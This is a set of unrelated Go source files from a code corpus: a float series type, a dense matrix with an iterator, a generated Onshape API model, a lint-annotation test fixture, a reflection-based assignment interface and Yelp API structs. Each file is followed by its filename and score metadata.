package godata
import "sort"
// FloatSeries is a sequence of float64 values with value-semantics
// operations: methods return new series rather than mutating the receiver.
type FloatSeries struct {
	data []float64 // backing storage, in insertion order
}
// NewFloatSeries builds a series over the given values. When called with an
// existing slice (NewFloatSeries(s...)) the slice is stored directly, so the
// series shares the caller's backing array until a copying operation such as
// Clone or Apply is performed.
func NewFloatSeries(data ...float64) FloatSeries {
	return FloatSeries{data: data}
}
// Append returns a copy of the series with the given elements added to the
// end. The receiver is left unmodified.
//
// Bug fix: the previous implementation built the extended copy but then
// returned the original receiver f, discarding the appended elements.
func (f FloatSeries) Append(elements ...float64) FloatSeries {
	changed := f.Clone()
	changed.data = append(changed.data, elements...)
	return changed
}
// Apply returns a new series whose elements are oper applied to each
// element of the receiver, in order. The receiver is unchanged.
func (f FloatSeries) Apply(oper func(float64) float64) FloatSeries {
	var out []float64
	for _, v := range f.data {
		out = append(out, oper(v))
	}
	return FloatSeries{data: out}
}
// Clone returns a deep copy of the series; the copy owns its own backing
// array and never aliases the receiver.
func (f FloatSeries) Clone() FloatSeries {
	var copied []float64
	copied = append(copied, f.data...)
	return FloatSeries{data: copied}
}
// Sum returns the arithmetic sum of all elements; an empty series sums to 0.
func (f FloatSeries) Sum() float64 {
	var total float64
	for _, v := range f.data {
		total += v
	}
	return total
}
// Size returns the number of elements in the series.
func (f FloatSeries) Size() int {
	return len(f.data)
}
// Avg returns the arithmetic mean of the series.
// NOTE(review): an empty series yields 0/0 = NaN (float division does not
// panic in Go); confirm callers expect NaN rather than 0 for this case.
func (f FloatSeries) Avg() float64 {
	return f.Sum() / float64(f.Size())
}
// Sort returns a copy of the series sorted in ascending order; the
// receiver is left in its original order.
func (f FloatSeries) Sort() FloatSeries {
	out := f.Clone()
	sort.Slice(out.data, func(a, b int) bool { return out.data[a] < out.data[b] })
	return out
}
// Max returns the position and value of the largest element in the series.
// For an empty series it returns (0, 0).
//
// Bug fix: the running maximum previously started at the zero value, so a
// series containing only negative numbers incorrectly reported (0, 0).
// Seeding from the first element fixes that while keeping the same result
// for every series containing a non-negative value.
func (f FloatSeries) Max() (pos int, max float64) {
	for x, entry := range f.data {
		if x == 0 || entry > max {
			max = entry
			pos = x
		}
	}
	return pos, max
}
// Min returns the position and value of the smallest element in the series.
// For an empty series it returns (0, 0).
//
// Bug fix: the running minimum previously started at the zero value, so a
// series containing only positive numbers incorrectly reported (0, 0).
// Seeding from the first element fixes that.
func (f FloatSeries) Min() (pos int, min float64) {
	for x, entry := range f.data {
		if x == 0 || entry < min {
			min = entry
			pos = x
		}
	}
	return pos, min
}
// Index returns the element at the given position.
// It panics (like slice indexing) when index is out of range.
func (f FloatSeries) Index(index int) float64 {
	return f.data[index]
}
// Concat returns a new series holding the elements of f followed by the
// elements of x. A fresh backing slice is always allocated: the previous
// append(f.data, x.data...) could write into f's backing array when spare
// capacity existed (e.g. for a series produced by Subset), silently
// corrupting sibling series.
func (f FloatSeries) Concat(x FloatSeries) FloatSeries {
	data := make([]float64, 0, len(f.data)+len(x.data))
	data = append(data, f.data...)
	data = append(data, x.data...)
	return FloatSeries{data: data}
}
// Subset returns a new series holding a copy of the elements in the
// half-open range [start, end). It panics when the bounds are out of
// range, matching slice semantics.
//
// Fix: the previous version stored the subslice directly, so the result
// shared the receiver's backing array; copying gives the subset
// independent storage, consistent with Clone.
func (f FloatSeries) Subset(start int, end int) FloatSeries {
	data := make([]float64, end-start)
	copy(data, f.data[start:end])
	return FloatSeries{data: data}
}
// PassThrough returns a new series containing only the elements whose
// corresponding entry in filter is true. Filter positions beyond the end
// of the series are ignored.
func (f FloatSeries) PassThrough(filter TruthFilter) FloatSeries {
	var kept []float64
	for i, ok := range filter {
		if ok && i < f.Size() {
			kept = append(kept, f.Index(i))
		}
	}
	return NewFloatSeries(kept...)
}
// GreaterThan returns a filter with one entry per element, true where the
// element is strictly greater than value.
func (f FloatSeries) GreaterThan(value float64) TruthFilter {
	var result TruthFilter
	for _, v := range f.data {
		result = append(result, v > value)
	}
	return result
}
// SmallerThan returns a filter with one entry per element, true where the
// element is strictly smaller than value.
func (f FloatSeries) SmallerThan(value float64) TruthFilter {
	var result TruthFilter
	for _, v := range f.data {
		result = append(result, v < value)
	}
	return result
}
// Find returns the index of the first element exactly equal to val, or -1
// when no element matches (note: exact float comparison).
func (f FloatSeries) Find(val float64) int {
	for i := range f.data {
		if f.data[i] == val {
			return i
		}
	}
	return -1
}
func (f FloatSeries) Filter(accept func(float64) bool) (filter TruthFilter) {
for _, val := range f.data {
filter = append(filter, accept(val))
}
return filter
} | floatseries.go | 0.780244 | 0.520009 | floatseries.go | starcoder |
package f64
import (
"context"
"log"
)
// DenseMatrix a dense matrix, stored row-major as data[row][column].
type DenseMatrix struct {
	c int // number of columns in the matrix (original comment had r/c swapped)
	r int // number of rows in the matrix
	data [][]float64 // row-major storage: data[row][column]
}
// NewDenseMatrix returns a zero-filled r-by-c DenseMatrix.
func NewDenseMatrix(r, c int) *DenseMatrix {
	return newMatrix(r, c, nil)
}
// NewDenseMatrixFromArray returns a DenseMatrix backed directly by data
// (the rows are not copied, so the caller shares storage with the matrix).
// All rows are assumed to have the same length as the first row.
//
// Fix: an empty or nil input now yields a 0x0 matrix instead of panicking
// on the unconditional data[0] access.
func NewDenseMatrixFromArray(data [][]float64) *DenseMatrix {
	r := len(data)
	c := 0
	if r > 0 {
		c = len(data[0])
	}
	return &DenseMatrix{data: data, r: r, c: c}
}
// newMatrix allocates an r-by-c matrix, optionally invoking initialise on
// each freshly created row together with its row index.
func newMatrix(r, c int, initialise func([]float64, int)) *DenseMatrix {
	m := &DenseMatrix{data: make([][]float64, r), r: r, c: c}
	for row := range m.data {
		m.data[row] = make([]float64, c)
		if initialise != nil {
			initialise(m.data[row], row)
		}
	}
	return m
}
// Columns the number of columns of the matrix.
func (s *DenseMatrix) Columns() int {
	return s.c
}
// Rows the number of rows of the matrix.
func (s *DenseMatrix) Rows() int {
	return s.r
}
// Update does a At and Set on the matrix element at r-th, c-th, replacing
// the element with f(old). It panics when either index is out of range.
//
// Fix: removed the redundant bare return at the end of the void function
// (staticcheck S1023).
func (s *DenseMatrix) Update(r, c int, f func(float64) float64) {
	if r < 0 || r >= s.Rows() {
		log.Panicf("Row '%+v' is invalid", r)
	}
	if c < 0 || c >= s.Columns() {
		log.Panicf("Column '%+v' is invalid", c)
	}
	s.data[r][c] = f(s.data[r][c])
}
// At returns the value of the matrix element at r-th, c-th.
// It panics when either index is out of range.
func (s *DenseMatrix) At(r, c int) float64 {
	switch {
	case r < 0 || r >= s.Rows():
		log.Panicf("Row '%+v' is invalid", r)
	case c < 0 || c >= s.Columns():
		log.Panicf("Column '%+v' is invalid", c)
	}
	return s.data[r][c]
}
// Set stores value into the matrix element at r-th, c-th.
// It panics when either index is out of range.
func (s *DenseMatrix) Set(r, c int, value float64) {
	switch {
	case r < 0 || r >= s.Rows():
		log.Panicf("Row '%+v' is invalid", r)
	case c < 0 || c >= s.Columns():
		log.Panicf("Column '%+v' is invalid", c)
	}
	s.data[r][c] = value
}
// ColumnsAt returns the c-th column as a new dense vector.
// It panics when c is out of range.
func (s *DenseMatrix) ColumnsAt(c int) Vector {
	if c < 0 || c >= s.Columns() {
		log.Panicf("Column '%+v' is invalid", c)
	}
	col := NewDenseVector(s.r)
	for row := 0; row < s.r; row++ {
		col.SetVec(row, s.data[row][c])
	}
	return col
}
// RowsAt returns the r-th row as a new dense vector.
// It panics when r is out of range.
func (s *DenseMatrix) RowsAt(r int) Vector {
	if r < 0 || r >= s.Rows() {
		log.Panicf("Row '%+v' is invalid", r)
	}
	row := NewDenseVector(s.c)
	for col := 0; col < s.c; col++ {
		row.SetVec(col, s.data[r][col])
	}
	return row
}
// RowsAtToArray returns a copy of the r-th row as a plain slice; the copy
// is independent of the matrix storage. It panics when r is out of range.
//
// Improvement: uses the built-in copy (a single memmove) instead of an
// element-by-element loop.
func (s *DenseMatrix) RowsAtToArray(r int) []float64 {
	if r < 0 || r >= s.Rows() {
		log.Panicf("Row '%+v' is invalid", r)
	}
	row := make([]float64, s.c)
	copy(row, s.data[r])
	return row
}
// Copy returns a deep copy of the matrix.
//
// Fix: the previous implementation branched on v != 0.0 but both branches
// performed the identical assignment row[c] = v, so the test was dead
// code; a straight per-row copy is equivalent and clearer.
func (s *DenseMatrix) Copy() Matrix {
	return newMatrix(s.Rows(), s.Columns(), func(row []float64, r int) {
		copy(row, s.data[r])
	})
}
// Scalar multiplication of a matrix by alpha; delegates to the
// package-level Scalar with a background context.
func (s *DenseMatrix) Scalar(alpha float64) Matrix {
	return Scalar(context.Background(), s, alpha)
}
// Multiply multiplies a matrix by another matrix, producing a fresh
// s.Rows() x m.Columns() result; neither operand is modified.
func (s *DenseMatrix) Multiply(m Matrix) Matrix {
	matrix := newMatrix(s.Rows(), m.Columns(), nil)
	MatrixMatrixMultiply(context.Background(), s, m, nil, matrix)
	return matrix
}
// Add addition of a matrix by another matrix. The destination is seeded
// from a copy of the receiver, so neither operand is modified.
func (s *DenseMatrix) Add(m Matrix) Matrix {
	matrix := s.Copy()
	Add(context.Background(), s, m, nil, matrix)
	return matrix
}
// Subtract subtracts one matrix from another matrix (s - m).
// NOTE(review): the destination is seeded from m.Copy() whereas Add seeds
// from s.Copy(); confirm the asymmetry is intentional and that the
// package-level Subtract fully overwrites the destination.
func (s *DenseMatrix) Subtract(m Matrix) Matrix {
	matrix := m.Copy()
	Subtract(context.Background(), s, m, nil, matrix)
	return matrix
}
// Negative the negative of a matrix, returned as a new matrix; the
// receiver is unchanged.
func (s *DenseMatrix) Negative() Matrix {
	matrix := s.Copy()
	Negative(context.Background(), s, nil, matrix)
	return matrix
}
// Transpose swaps the rows and columns into a new c-by-r matrix; the
// receiver is unchanged.
func (s *DenseMatrix) Transpose() Matrix {
	matrix := newMatrix(s.Columns(), s.Rows(), nil)
	Transpose(context.Background(), s, nil, matrix)
	return matrix
}
// Equal reports whether the two matrices are equal, delegating to the
// package-level Equal.
func (s *DenseMatrix) Equal(m Matrix) bool {
	return Equal(context.Background(), s, m)
}
// NotEqual reports whether the two matrices differ, delegating to the
// package-level NotEqual.
func (s *DenseMatrix) NotEqual(m Matrix) bool {
	return NotEqual(context.Background(), s, m)
}
// Size of the matrix: the total number of cells (rows * columns).
func (s *DenseMatrix) Size() int {
	return s.r * s.c
}
// Values the number of elements in the matrix. For a dense matrix this is
// every cell (r*c), not only the non-zero entries.
func (s *DenseMatrix) Values() int {
	return s.r * s.c
}
// Clear resets every element to zero by reallocating the row storage;
// the matrix dimensions are preserved.
func (s *DenseMatrix) Clear() {
	rows := make([][]float64, s.r)
	for i := range rows {
		rows[i] = make([]float64, s.c)
	}
	s.data = rows
}
// RawMatrix returns the raw matrix storage. The caller shares the backing
// slices with the receiver; mutations are visible to both.
func (s *DenseMatrix) RawMatrix() [][]float64 {
	return s.data
}
// Enumerate iterates through all non-zero elements, order is not guaranteed.
// NOTE(review): the dense iterator actually visits every cell, including
// zeros, in row-major order — confirm whether the doc or the behaviour
// should change.
func (s *DenseMatrix) Enumerate() Enumerate {
	return s.iterator()
}
// iterator builds a fresh row-major cell iterator over the matrix; the
// cursor fields all start at their zero values.
func (s *DenseMatrix) iterator() *denseMatrixIterator {
	return &denseMatrixIterator{
		matrix: s,
		size:   s.Values(),
	}
}
// denseMatrixIterator walks a DenseMatrix cell by cell in row-major order.
type denseMatrixIterator struct {
	matrix *DenseMatrix // matrix being iterated
	size int // total number of cells to visit
	last int // count of cells consumed so far
	c int // next column to advance to
	r int // current row
	cOld int // column of the most recently returned cell
	rOld int // never read or written in this file — likely vestigial
}
// HasNext checks the iterator has any more values.
// Simplified from an if/return true/return false chain into a single
// boolean expression (staticcheck S1008).
func (s *denseMatrixIterator) HasNext() bool {
	return s.last < s.size
}
// next advances the cursor one cell, wrapping to the next row when the
// column index has run past the end of the current row. cOld records the
// column of the cell being handed out, because c is incremented past it.
func (s *denseMatrixIterator) next() {
	if s.c == s.matrix.Columns() {
		s.c = 0
		s.r++
	}
	s.cOld = s.c
	s.c++
	s.last++
}
// Next moves the iterator and returns the row, column and value of the
// next cell. Callers must check HasNext first; advancing past the end
// makes At panic on the out-of-range row.
func (s *denseMatrixIterator) Next() (int, int, float64) {
	s.next()
	return s.r, s.cOld, s.matrix.At(s.r, s.cOld)
}
// Map replace each element with the result of applying a function to its
// value; the returned Map wraps a fresh iterator over this matrix.
func (s *DenseMatrix) Map() Map {
	t := s.iterator()
	i := &denseMatrixMap{t}
	return i
}
// denseMatrixMap adapts denseMatrixIterator to the Map interface,
// allowing in-place mutation of elements while iterating.
type denseMatrixMap struct {
	*denseMatrixIterator
}
// HasNext checks the iterator has any more values.
// NOTE(review): this override only forwards to the embedded iterator and
// could be removed — embedding already promotes HasNext.
func (s *denseMatrixMap) HasNext() bool {
	return s.denseMatrixIterator.HasNext()
}
// Map move the iterator and uses a higher order function to changes the
// elements current value: f(row, col, old) is written back into the
// underlying matrix at the cell just visited.
func (s *denseMatrixMap) Map(f func(int, int, float64) float64) {
	s.next()
	s.matrix.Set(s.r, s.cOld, f(s.r, s.cOld, s.matrix.At(s.r, s.cOld)))
}
// Element of the mask for each tuple that exists in the matrix for which
// the value of the tuple cast to Boolean is true. Exported wrapper around
// element; see its truth rule (value > 0).
func (s *DenseMatrix) Element(r, c int) bool {
	return s.element(r, c)
}
func (s *DenseMatrix) element(r, c int) bool {
return s.At(r, c) > 0
} | f64/denseMatrix.go | 0.849472 | 0.631367 | denseMatrix.go | starcoder |
package onshape
import (
"encoding/json"
)
// BTMSketchPoint158 struct for BTMSketchPoint158
// Generated API model; pointer fields are optional and omitted from the
// JSON encoding when nil.
type BTMSketchPoint158 struct {
	BTMSketchGeomEntity5
	BtType *string `json:"btType,omitempty"`
	IsUserPoint *bool `json:"isUserPoint,omitempty"`
	X *float64 `json:"x,omitempty"`
	Y *float64 `json:"y,omitempty"`
}
// NewBTMSketchPoint158 instantiates a new BTMSketchPoint158 object
// This constructor will assign default values to properties that have it defined,
// and makes sure properties required by API are set, but the set of arguments
// will change when the set of required properties is changed
// All optional pointer fields start unset (nil).
func NewBTMSketchPoint158() *BTMSketchPoint158 {
	this := BTMSketchPoint158{}
	return &this
}
// NewBTMSketchPoint158WithDefaults instantiates a new BTMSketchPoint158 object
// This constructor will only assign default values to properties that have it defined,
// but it doesn't guarantee that properties required by API are set
// All optional pointer fields start unset (nil).
func NewBTMSketchPoint158WithDefaults() *BTMSketchPoint158 {
	this := BTMSketchPoint158{}
	return &this
}
// GetBtType returns the BtType field value if set, zero value otherwise.
// Safe to call on a nil receiver.
func (o *BTMSketchPoint158) GetBtType() string {
	if o == nil || o.BtType == nil {
		var ret string
		return ret
	}
	return *o.BtType
}
// GetBtTypeOk returns a tuple with the BtType field value if set, nil otherwise
// and a boolean to check if the value has been set.
// Safe to call on a nil receiver.
func (o *BTMSketchPoint158) GetBtTypeOk() (*string, bool) {
	if o == nil || o.BtType == nil {
		return nil, false
	}
	return o.BtType, true
}
// HasBtType returns a boolean if a field has been set.
// Collapsed the if/return true/return false chain into one boolean
// expression (staticcheck S1008); nil-receiver safety is preserved.
func (o *BTMSketchPoint158) HasBtType() bool {
	return o != nil && o.BtType != nil
}
// SetBtType gets a reference to the given string and assigns it to the BtType field.
// The argument is copied, so later changes to the caller's variable do not
// affect the struct.
func (o *BTMSketchPoint158) SetBtType(v string) {
	o.BtType = &v
}
// GetIsUserPoint returns the IsUserPoint field value if set, zero value otherwise.
// Safe to call on a nil receiver.
func (o *BTMSketchPoint158) GetIsUserPoint() bool {
	if o == nil || o.IsUserPoint == nil {
		var ret bool
		return ret
	}
	return *o.IsUserPoint
}
// GetIsUserPointOk returns a tuple with the IsUserPoint field value if set, nil otherwise
// and a boolean to check if the value has been set.
// Safe to call on a nil receiver.
func (o *BTMSketchPoint158) GetIsUserPointOk() (*bool, bool) {
	if o == nil || o.IsUserPoint == nil {
		return nil, false
	}
	return o.IsUserPoint, true
}
// HasIsUserPoint returns a boolean if a field has been set.
// Collapsed the if/return true/return false chain into one boolean
// expression (staticcheck S1008); nil-receiver safety is preserved.
func (o *BTMSketchPoint158) HasIsUserPoint() bool {
	return o != nil && o.IsUserPoint != nil
}
// SetIsUserPoint gets a reference to the given bool and assigns it to the IsUserPoint field.
// The argument is copied, so later changes to the caller's variable do not
// affect the struct.
func (o *BTMSketchPoint158) SetIsUserPoint(v bool) {
	o.IsUserPoint = &v
}
// GetX returns the X field value if set, zero value otherwise.
// Safe to call on a nil receiver.
func (o *BTMSketchPoint158) GetX() float64 {
	if o == nil || o.X == nil {
		var ret float64
		return ret
	}
	return *o.X
}
// GetXOk returns a tuple with the X field value if set, nil otherwise
// and a boolean to check if the value has been set.
// Safe to call on a nil receiver.
func (o *BTMSketchPoint158) GetXOk() (*float64, bool) {
	if o == nil || o.X == nil {
		return nil, false
	}
	return o.X, true
}
// HasX returns a boolean if a field has been set.
// Collapsed the if/return true/return false chain into one boolean
// expression (staticcheck S1008); nil-receiver safety is preserved.
func (o *BTMSketchPoint158) HasX() bool {
	return o != nil && o.X != nil
}
// SetX gets a reference to the given float64 and assigns it to the X field.
// The argument is copied, so later changes to the caller's variable do not
// affect the struct.
func (o *BTMSketchPoint158) SetX(v float64) {
	o.X = &v
}
// GetY returns the Y field value if set, zero value otherwise.
// Safe to call on a nil receiver.
func (o *BTMSketchPoint158) GetY() float64 {
	if o == nil || o.Y == nil {
		var ret float64
		return ret
	}
	return *o.Y
}
// GetYOk returns a tuple with the Y field value if set, nil otherwise
// and a boolean to check if the value has been set.
// Safe to call on a nil receiver.
func (o *BTMSketchPoint158) GetYOk() (*float64, bool) {
	if o == nil || o.Y == nil {
		return nil, false
	}
	return o.Y, true
}
// HasY returns a boolean if a field has been set.
// Collapsed the if/return true/return false chain into one boolean
// expression (staticcheck S1008); nil-receiver safety is preserved.
func (o *BTMSketchPoint158) HasY() bool {
	return o != nil && o.Y != nil
}
// SetY gets a reference to the given float64 and assigns it to the Y field.
// The argument is copied, so later changes to the caller's variable do not
// affect the struct.
func (o *BTMSketchPoint158) SetY(v float64) {
	o.Y = &v
}
// MarshalJSON serialises the point: the embedded BTMSketchGeomEntity5 is
// flattened into the same JSON object, then the point's own optional
// fields are layered on top (set fields only).
func (o BTMSketchPoint158) MarshalJSON() ([]byte, error) {
	out := map[string]interface{}{}
	embedded, err := json.Marshal(o.BTMSketchGeomEntity5)
	if err != nil {
		return []byte{}, err
	}
	if err = json.Unmarshal(embedded, &out); err != nil {
		return []byte{}, err
	}
	if o.BtType != nil {
		out["btType"] = o.BtType
	}
	if o.IsUserPoint != nil {
		out["isUserPoint"] = o.IsUserPoint
	}
	if o.X != nil {
		out["x"] = o.X
	}
	if o.Y != nil {
		out["y"] = o.Y
	}
	return json.Marshal(out)
}
// NullableBTMSketchPoint158 wraps a BTMSketchPoint158 pointer together
// with an explicit "has been set" flag, distinguishing an unset value
// from an explicit JSON null.
type NullableBTMSketchPoint158 struct {
	value *BTMSketchPoint158 // the wrapped value; nil marshals to JSON null
	isSet bool // true once Set or UnmarshalJSON has run
}
// Get returns the wrapped value; nil when unset or explicitly null.
func (v NullableBTMSketchPoint158) Get() *BTMSketchPoint158 {
	return v.value
}
// Set stores val (which may be nil, meaning explicit null) and marks the
// wrapper as set.
func (v *NullableBTMSketchPoint158) Set(val *BTMSketchPoint158) {
	v.value = val
	v.isSet = true
}
// IsSet reports whether a value (possibly nil) has been assigned.
func (v NullableBTMSketchPoint158) IsSet() bool {
	return v.isSet
}
// Unset clears the value and marks the wrapper as not set.
func (v *NullableBTMSketchPoint158) Unset() {
	v.value = nil
	v.isSet = false
}
// NewNullableBTMSketchPoint158 wraps val in an already-set nullable.
func NewNullableBTMSketchPoint158(val *BTMSketchPoint158) *NullableBTMSketchPoint158 {
	return &NullableBTMSketchPoint158{value: val, isSet: true}
}
// MarshalJSON encodes the wrapped value; a nil value encodes as null.
func (v NullableBTMSketchPoint158) MarshalJSON() ([]byte, error) {
	return json.Marshal(v.value)
}
func (v *NullableBTMSketchPoint158) UnmarshalJSON(src []byte) error {
v.isSet = true
return json.Unmarshal(src, &v.value)
} | onshape/model_btm_sketch_point_158.go | 0.72487 | 0.473109 | model_btm_sketch_point_158.go | starcoder |
// lint:file-ignore S1001 // want "Disabling of linter must have an annotation associated with it. Please visit https://transcom.github.io/mymove-docs/docs/dev/contributing/code-analysis/Guide-to-Static-Analysis-Annotations-for-Disabled-Linters"
//RA Summary: [linter] - [linter type code] - [Linter summary] // want "Please add the truss-is3 team as reviewers for this PR and ping the ISSO in #static-code-review Slack. Add label ‘needs-is3-review’ to this PR. For more info see https://transcom.github.io/mymove-docs/docs/dev/contributing/code-analysis/Guide-to-Static-Analysis-Security-Workflow"
//RA: <Why did the linter flag this line of code?>
//RA: <Why is this line of code valuable?>
//RA: <What mitigates the risk of negative impact?>
//RA Developer Status: {RA Request, RA Accepted, POA&M Request, POA&M Accepted, Mitigated, Need Developer Fix, False Positive, Bad Practice}
//RA Validator Status: {RA Accepted, Return to Developer, Known Issue, Mitigated, False Positive, Bad Practice}
//RA Modified Severity: CAT III
// lint:file-ignore SA1017
//RA Summary: staticcheck - SA2002 - Weak cryptographic hash // want "Please add the truss-is3 team as reviewers for this PR and ping the ISSO in #static-code-review Slack. Add label ‘needs-is3-review’ to this PR. For more info see https://transcom.github.io/mymove-docs/docs/dev/contributing/code-analysis/Guide-to-Static-Analysis-Security-Workflow"
//RA: This line was flagged because of the use of MD5 hashing
//RA: This line of code hashes the AWS object to be able to verify data integrity
//RA: Purpose of this hash is to protect against environmental risks, it does not
//RA: hash any sensitive user provided information such as passwords.
//RA: AWS S3 API requires use of MD5 to validate data integrity.
//RA Developer Status:
//RA Validator Status:
//RA Modified Severity: CAT III
// lint:file-ignore SA2002
//RA Summary: staticcheck - ST1021 - Unchecked return value
//RA: Linter flags errcheck error: Ignoring a method's return value can cause the program to overlook unexpected states and conditions.
//RA: Functions with unchecked return values in the file are used to close a local server connection to ensure a unit test server is not left running indefinitely
//RA: Given the functions causing the lint errors are used to close a local server connection for testing purposes, it is not deemed a risk
//RA Developer Status: Mitigated
//RA Validator Status: Mitigated
//RA Validator: <EMAIL>
//RA Modified Severity: N/A
// lint:file-ignore ST1021
// Package atotest is fixture source for an analysis test: the "// want"
// comments are diagnostics expected by analysistest, and the lint/RA
// annotation comment blocks are the inputs under test. Comment placement
// is significant — edit with care.
package atotest
// lint:ignore // want "Please provide the rule that is being disabled"
func staticcheckShouldProvideRule() {}
// lint:ignore S1001 // want "Disabling of linter must have an annotation associated with it. Please visit https://transcom.github.io/mymove-docs/docs/dev/contributing/code-analysis/Guide-to-Static-Analysis-Annotations-for-Disabled-Linters"
func staticcheckShouldHaveAnnotation() {}
//RA Summary: [linter] - [linter type code] - [Linter summary] // want "Please add the truss-is3 team as reviewers for this PR and ping the ISSO in #static-code-review Slack. Add label ‘needs-is3-review’ to this PR. For more info see https://transcom.github.io/mymove-docs/docs/dev/contributing/code-analysis/Guide-to-Static-Analysis-Security-Workflow"
//RA: <Why did the linter flag this line of code?>
//RA: <Why is this line of code valuable?>
//RA: <What mitigates the risk of negative impact?>
//RA Developer Status: {RA Request, RA Accepted, POA&M Request, POA&M Accepted, Mitigated, Need Developer Fix, False Positive, Bad Practice}
//RA Validator Status: {RA Accepted, Return to Developer, Known Issue, Mitigated, False Positive, Bad Practice}
//RA Modified Severity: CAT III
// lint:ignore SA1017
func staticcheckAnnotationNotApprovedTemplate() {}
//RA Summary: staticcheck - SA2002 - Weak cryptographic hash // want "Please add the truss-is3 team as reviewers for this PR and ping the ISSO in #static-code-review Slack. Add label ‘needs-is3-review’ to this PR. For more info see https://transcom.github.io/mymove-docs/docs/dev/contributing/code-analysis/Guide-to-Static-Analysis-Security-Workflow"
//RA: This line was flagged because of the use of MD5 hashing
//RA: This line of code hashes the AWS object to be able to verify data integrity
//RA: Purpose of this hash is to protect against environmental risks, it does not
//RA: hash any sensitive user provided information such as passwords.
//RA: AWS S3 API requires use of MD5 to validate data integrity.
//RA Developer Status:
//RA Validator Status:
//RA Modified Severity: CAT III
// lint:ignore SA2002
func staticcheckAnnotationNotApprovedEmpty() {}
//RA Summary: staticcheck - ST1021 - Unchecked return value
//RA: Linter flags errcheck error: Ignoring a method's return value can cause the program to overlook unexpected states and conditions.
//RA: Functions with unchecked return values in the file are used to close a local server connection to ensure a unit test server is not left running indefinitely
//RA: Given the functions causing the lint errors are used to close a local server connection for testing purposes, it is not deemed a risk
//RA Developer Status: Mitigated
//RA Validator Status: Mitigated
//RA Validator: <EMAIL>
//RA Modified Severity: N/A
// lint:ignore ST1021
func staticcheckAnnotationApproved() {}
package assign
import (
"reflect"
)
// Source represents any value which can be assigned to a Go value.
type Source interface {
// Kind is the reflection based kind of the type.
Kind() reflect.Kind
// Elem is the contained value of the pointer or interface.
Elem() Source
// FieldByName retrieves the field value of the struct by name.
FieldByName(string) Source
// Len is the length of the map, slice or array.
Len() int
// Index retrieves the element of the slice or array at the index.
Index(int) Source
// Pointer retrieves the underlying pointer of the value.
// This is used to prevent circular paths.
// Disable this from being used with the WithoutCycle option.
Pointer() uintptr
// MapRange provides a map iterator.
MapRange() MapIter
// Skip is how values are skipped for assignment.
// This can be useful for invalid or zero values.
Skip() bool
// Interface provides the underlying Go value.
// This is needed for basic Go types, e.g. bool, int, string, etc.
Interface() interface{}
}
// Of provides a Source from any given value.
// Handles Source directly, otherwise defaults to goSource
// which handles reflect.Value as well.
func Of(i interface{}) Source {
if val, ok := i.(Source); ok {
return val
}
return &goSource{val: valueOf(i)}
}
// valueOf provides the reflection value of the given Go value
// even if the Go value is a reflection value.
func valueOf(i interface{}) reflect.Value {
if val, ok := i.(reflect.Value); ok {
return val
}
return reflect.ValueOf(i)
}
// goSource satisfies Source for Go values.
type goSource struct {
val reflect.Value
}
func (v *goSource) Kind() reflect.Kind {
return v.val.Kind()
}
func (v *goSource) Elem() Source {
return &goSource{val: v.val.Elem()}
}
func (v *goSource) FieldByName(name string) Source {
return &goSource{val: v.val.FieldByName(name)}
}
func (v *goSource) Len() int {
return v.val.Len()
}
func (v *goSource) Index(i int) Source {
return &goSource{val: v.val.Index(i)}
}
func (v *goSource) Pointer() uintptr {
return v.val.Pointer()
}
func (v *goSource) MapRange() MapIter {
return &GoMapIter{it: v.val.MapRange()}
}
func (v *goSource) Skip() bool {
return !v.val.IsValid() || v.val.IsZero()
}
func (v *goSource) Interface() interface{} {
return v.val.Interface()
}
var _ Source = (*goSource)(nil)
// MapIter provides a way to iterate over maps types.
type MapIter interface {
Next() bool
Key() Source
Value() Source
}
// GoMapIter satisfies MapIter.
type GoMapIter struct {
it *reflect.MapIter
}
func (m *GoMapIter) Next() bool {
return m.it.Next()
}
func (m *GoMapIter) Key() Source {
return &goSource{val: m.it.Key()}
}
func (m *GoMapIter) Value() Source {
return &goSource{val: m.it.Value()}
}
var _ MapIter = (*GoMapIter)(nil) | source.go | 0.713731 | 0.407982 | source.go | starcoder |
package yelp
// A SearchResult is returned from the Search API. It includes
// the region, the total number of results, and a list of matching businesses.
// The business objects returned by this query are shallow - they will not include
// deep results such as reviews.
type SearchResult struct {
Region Region // Suggested bounds in a map to display results in
Total int // Total number of business results
Businesses []Business // The list of business entries (see Business)
}
// Region provides the location of a business obtained from search.
type Region struct {
Span Span // Span of suggested map bounds
Center Center // Center position of map bounds
}
// Span provides the variance of the location from the region in the search result.
type Span struct {
LatitudeDelta float32 `json:"latitude_delta"` // Latitude width of map bounds
LongitudeDelta float32 `json:"longitude_delta"` // Longitude height of map bounds
}
// Center provides the coordinate where the business is most likely to be located.
type Center struct {
Latitude float32 // Latitude position of map bounds center
Longitude float32 // Longitude position of map bounds center
}
// Deal defines a set of special offerings from the business.
type Deal struct {
ID string // Deal identifier
Title string // Deal title
URL string // Deal URL
ImageURL string `json:"image_URL"` // Deal image URL
CurrencyCode string `json:"currency_code"` // ISO_4217 Currency Code
TimeStart float32 `json:"time_start"` // Deal start time (Unix timestamp)
TimeEnd float32 `json:"time_end"` // Deal end time (optional: this field is present only if the Deal ends)
IsPopular bool `json:"is_popular"` // Whether the Deal is popular (optional: this field is present only if true)
WhatYouGet string `json:"what_you_get"` // Additional details for the Deal, separated by newlines
ImportantRestrictions string `json:"Important_restrictions"` // Important restrictions for the Deal, separated by newlines
AdditionalRestrictions string `json:"Additional_restrictions"` // Deal additional restrictions
Options []DealOption //Deal options
}
// DealOption provides options are optionally included on a deal.
type DealOption struct {
Title string // Deal option title
PurchaseURL string `json:"Purchase_URL"` // Deal option URL for purchase
Price float32 // Deal option price (in cents)
FormattedPrice string `json:"Formatted_price"` // Deal option price (formatted, e.g. "$6")
OriginalPrice float32 `json:"Original_price"` // Deal option original price (in cents)
FormattedOriginalPrice string `json:"Formatted_original_price"` // Deal option original price (formatted, e.g. "$12")
IsQuantityLimited bool `json:"Is_quantity_limited"` // Whether the deal option is limited or unlimited
RemainingCount float32 `json:"Remaining_count"` // The remaining deal options available for purchase (optional: this field is only present if the deal is limited)
}
// GiftCertificate defines optional data available on Businesses.
type GiftCertificate struct {
ID string // Gift certificate identifier
URL string // Gift certificate landing page URL
ImageURL string `json:"Image_URL"` // Gift certificate image URL
CurrencyCode string `json:"Currency_code"` // ISO_4217 Currency Code
UnusedBalances string `json:"Unused_balances"` // Whether unused balances are returned as cash or store credit
Options []GiftCertificateOptions // Gift certificate options
}
// GiftCertificateOptions can define a set of pricing options for a gift certificate.
type GiftCertificateOptions struct {
Price float32 // Gift certificate option price (in cents)
FormattedPrice string `json:"Formatted_price"` // Gift certificate option price (formatted, e.g. "$50")
}
